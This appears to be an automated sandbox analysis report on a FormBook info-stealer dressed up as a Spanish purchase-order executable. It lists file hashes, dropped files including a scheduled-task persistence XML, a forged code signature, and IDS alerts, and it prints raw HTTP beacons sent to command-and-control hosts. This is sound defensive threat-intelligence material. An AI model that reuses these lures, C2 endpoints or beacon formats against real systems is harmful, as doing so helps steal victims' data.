                                           • MKCC-MEC-RFQ-115-2024.exe | malicious | FormBook | 185.53.179.91
                                           • http://pollyfill.io | malicious | Unknown | 185.53.178.30
                                           • mQY9ka5sW6hv2Ri.exe | malicious | FormBook | 185.53.179.90
                                           • Cheat.malware_exe.exe | malicious | Unknown | 185.53.177.31
                                           • Cheat.malware_exe.exe | malicious | Unknown | 185.53.177.31
                                           • 2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook | 185.53.179.91
                                           • DHL AWB DOCUMENT.pdf.exe | malicious | FormBook | 185.53.179.93
                                           • yq5xNPpWCT.exe | malicious | PureLog Stealer, SystemBC | 185.53.177.112
                                           • Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe | malicious | FormBook | 185.53.179.92
                                           • DHL ARRIVAL DOCUMENTS.pdf.exe | malicious | FormBook | 185.53.179.90
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):2232
                                          Entropy (8bit):5.378486415808052
                                          Encrypted:false
                                          SSDEEP:48:fWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMuge//ZVyus:fLHxcIalLgZ2KRHWLOugos
                                          MD5:AFDE43A9E7B4FE73F558EAADAC9DC902
                                          SHA1:A8B7148F9972FC7299F5F69D555ED6C9B85793AD
                                          SHA-256:F6B97E93A21970BDB9CE8147326447D051BDF28D54F6D87158BBF9A8EA3E4C85
                                          SHA-512:8438A9D63EEE59EA5A68B728AA021958B929A890ECDB0F135EBF2D1FD08C2391C41429FE5DB3CA1E0B616BE49C384F0E5288E1C399372FC4FD514F71E036528A
                                          Malicious:false
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1600
                                          Entropy (8bit):5.100670563915343
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLqxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTKv
                                          MD5:6A3333833D2CFBAE8839B99F424E7D5D
                                          SHA1:CEAC6D03B27A1C2EC042C9F61DD941AB343A1A33
                                          SHA-256:9F4100077BC447FC2A854A683817386FDE3BF015A5ECC896B3223CDC1E5A01EF
                                          SHA-512:B47F6009B4521E5E4B338785984C7B4506317FB7BC6754F630611678A993F2B9431EA0B523032D4F28C6F1698630E1DCA4E982FB9D8DA4745F287CD95504F6E4
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                          Process:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1600
                                          Entropy (8bit):5.100670563915343
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLqxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTKv
                                          MD5:6A3333833D2CFBAE8839B99F424E7D5D
                                          SHA1:CEAC6D03B27A1C2EC042C9F61DD941AB343A1A33
                                          SHA-256:9F4100077BC447FC2A854A683817386FDE3BF015A5ECC896B3223CDC1E5A01EF
                                          SHA-512:B47F6009B4521E5E4B338785984C7B4506317FB7BC6754F630611678A993F2B9431EA0B523032D4F28C6F1698630E1DCA4E982FB9D8DA4745F287CD95504F6E4
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):861704
                                          Entropy (8bit):7.645357408649112
                                          Encrypted:false
                                          SSDEEP:12288:xlGi6JNf+wrwcmujqGaCWcpHrdTIonHhX5AsYzYlNTpGGFNtLPHU3GizlZjf9/8y:ShJtCuqGzWcnIuhp9ycGOBmA6
                                          MD5:7BB0F568CE14D2350C704AEA2C4BC9DE
                                          SHA1:3C6CC8DE9A66613CE41F37CF1FD22990E80CE725
                                          SHA-256:EAFFC7CC6DA06F5894642BB88FFF4A0186CF61100558AF3CB552145F86D8E041
                                          SHA-512:F9B5DF159BDA1AADA29FA079B9B1CBBF054828DA34FE46F3BBAB140AAEBE5C135B1DE25ACB53E3CF59B72AF80CB6199464E0A0E32F5A687E0FB7BE9B778C057D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 26%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*V.f..............0..`..........n.... ........@.. .......................@............@................................. ...K........................6... ....................................................... ............... ..H............text...t_... ...`.................. ..`.rsrc................b..............@..@.reloc....... ......................@..B................P.......H.......p...............H...(........................................................................*..*&..(.....*R..{.....o....o%....*R...o....oi...(8....*B..{.....<o.....*B..{......o.....*B..{......o.....*>..{.....o.....*B..{......o.....*>..{.....o.....*:..{....o.....*v.rW..p.o....oi...(C...(D...&*R..{.....o....o3...&*...{.....o....o.....o....o....o.....*...{.....{....o[....{....o]...o.....*nr...p......%..+.(.........*2......s>...*"..o?...*..o@...*"..(A...*.(B...*"..(C...*
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.645357408649112
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Orden de compra 0307AR24.exe
                                          File size:861'704 bytes
                                          MD5:7bb0f568ce14d2350c704aea2c4bc9de
                                          SHA1:3c6cc8de9a66613ce41f37cf1fd22990e80ce725
                                          SHA256:eaffc7cc6da06f5894642bb88fff4a0186cf61100558af3cb552145f86d8e041
                                          SHA512:f9b5df159bda1aada29fa079b9b1cbbf054828da34fe46f3bbab140aaebe5c135b1de25acb53e3cf59b72af80cb6199464e0a0e32f5a687e0fb7be9b778c057d
                                          SSDEEP:12288:xlGi6JNf+wrwcmujqGaCWcpHrdTIonHhX5AsYzYlNTpGGFNtLPHU3GizlZjf9/8y:ShJtCuqGzWcnIuhp9ycGOBmA6
                                          TLSH:9605C0E87340A4AED85BC179D4765D63E673B11F9E1A410E2453BE4B7C2E343C9238AB
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*V.f..............0..`..........n.... ........@.. .......................@............@................................
                                          Icon Hash:2eec8e8cb683b9b1
                                          Entrypoint:0x4b7f6e
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6685562A [Wed Jul 3 13:46:18 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Signature Valid:false
                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before / Not After:13/11/2018 01:00:00 / 09/11/2021 00:59:59
                                          Subject Chain:CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                          Version:3
                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                          Serial:7C1118CBBADC95DA3752C46E47A27438
                                          Instruction (entrypoint disassembly):
                                          jmp dword ptr [00402000h]
                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7f20          0x4b          .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb8000          0x18ab0       .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0xcf000          0x3608
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd2000          0xc           .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                          Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
                                          .text   0x2000           0xb5f74       0xb6000   2c5ad81765f56594c1572b96383924f4  False     0.8644724416208791   data       7.825436593603401    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc   0xb8000          0x18ab0       0x18c00   5f32348aefb46229f1239d509b95bc4d  False     0.14479758522727273  data       4.274130101184592    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc  0xd2000          0xc           0x200     6771793aa70c21b7a6a469fcf7e7e76d  False     0.044921875          data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          Name           RVA      Size     Type                                                                                              Language  Country  ZLIB Complexity
                                          RT_ICON        0xb81d8  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m                          0.2649377593360996
                                          RT_ICON        0xba780  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m                          0.3646810506566604
                                          RT_ICON        0xbb828  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m                          0.5549645390070922
                                          RT_ICON        0xbbc90  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m                        0.18115257439773264
                                          RT_ICON        0xbfeb8  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m                       0.0959718443156276
                                          RT_GROUP_ICON  0xd06e0  0x4c     data                                                                                                                   0.7631578947368421
                                          RT_GROUP_ICON  0xd072c  0x14     data                                                                                                                   1.05
                                          RT_VERSION     0xd0740  0x36a    data                                                                                                                   0.43135011441647597
                                          DLL          Import
                                          mscoree.dll  _CorExeMain
                                          Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
                                          07/03/24-18:33:16.719137  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49729        80         192.168.2.6  198.185.159.144
                                          07/03/24-18:32:36.955975  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.6  185.53.179.92
                                          07/03/24-18:35:19.798968  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.6  3.33.130.190
                                          07/03/24-18:36:23.287483  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49741        80         192.168.2.6  54.67.42.145
                                          07/03/24-18:36:00.832032  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49740        80         192.168.2.6  198.185.159.144
                                          07/03/24-18:33:37.796874  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49732        80         192.168.2.6  203.196.8.7
                                          07/03/24-18:34:18.302843  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49734        80         192.168.2.6  15.197.142.173
                                          07/03/24-18:35:40.453540  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49739        80         192.168.2.6  104.18.187.223
                                          07/03/24-18:34:59.312116  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49736        80         192.168.2.6  192.250.227.27
                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          0           192.168.2.6  49724        185.53.179.92   80                4004  C:\Windows\explorer.exe
                                          Timestamp                           Bytes transferred  Direction  Data
                                          Jul 3, 2024 18:32:36.955975056 CEST  194                OUT        GET /md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                                                                                             Host: www.ux-design-courses-17184.bond
                                                                                                             Connection: close
                                                                                                             Data Raw: 00 00 00 00 00 00 00
                                                                                                             Data Ascii:


                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                          1           192.168.2.6  49729        198.185.159.144  80                4004  C:\Windows\explorer.exe
                                          Timestamp                           Bytes transferred  Direction  Data
                                          Jul 3, 2024 18:33:16.719136953 CEST  190                OUT        GET /md02/?TPXh=50vPMniPucPBFAoGypRNvn+9klri27h0dApk4meYCliplUm/ww094FdaSsyOnJ5jMG3DM+yUOg==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                                                                                             Host: www.coloradoskinwellness.com
                                                                                                             Connection: close
                                                                                                             Data Raw: 00 00 00 00 00 00 00
                                                                                                             Data Ascii:
                                          Jul 3, 2024 18:33:17.173898935 CEST  1236               IN         HTTP/1.1 400 Bad Request
                                                                                                             Cache-Control: no-cache, must-revalidate
                                                                                                             Content-Length: 2061
                                                                                                             Content-Type: text/html; charset=UTF-8
                                                                                                             Date: Wed, 03 Jul 2024 16:33:17 UTC
                                                                                                             Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                             Pragma: no-cache
                                                                                                             Server: Squarespace
                                                                                                             X-Contextid: kap5k5ZG/wsesyS8Z
                                                                                                             Connection: close
                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em;
                                          Timestamp:Jul 3, 2024 18:33:17.173918009 CEST
                                          Bytes transferred:1124
                                          Direction:IN
